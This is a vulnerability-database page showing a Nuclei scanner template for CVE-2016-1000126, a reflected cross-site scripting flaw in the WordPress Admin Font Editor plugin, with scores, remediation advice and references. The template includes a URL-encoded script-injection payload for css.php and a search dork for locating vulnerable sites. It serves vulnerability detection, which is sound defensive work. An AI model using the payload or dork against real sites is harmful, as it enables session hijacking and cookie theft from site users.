Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-1000126
HistoryJul 16, 2021 - 1:43 p.m.

WordPress Admin Font Editor <=1.8 - Cross-Site Scripting

2021-07-1613:43:22
ProjectDiscovery
github.com

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

46.4%

WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2016-1000126

info:
  name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability.
  reference:
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=526
    - https://wordpress.org/plugins/admin-font-editor
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2016-1000126
    cwe-id: CWE-79
    epss-score: 0.00119
    epss-percentile: 0.46028
    cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: "admin-font-editor_project"
    product: "admin-font-editor"
    framework: wordpress
    google-query: "inurl:\"/wp-content/plugins/admin-font-editor\""
  tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Admin Font Editor'

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203079f3b7e9b0f86307b1651ac4411c822f8293ca879f3f2d229e487781e300b20221009ba7d5c5f0fce5453c2181ef196132eb238bca7cd78fa7c847f339e29c536d6e:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

46.4%

Related for NUCLEI:CVE-2016-1000126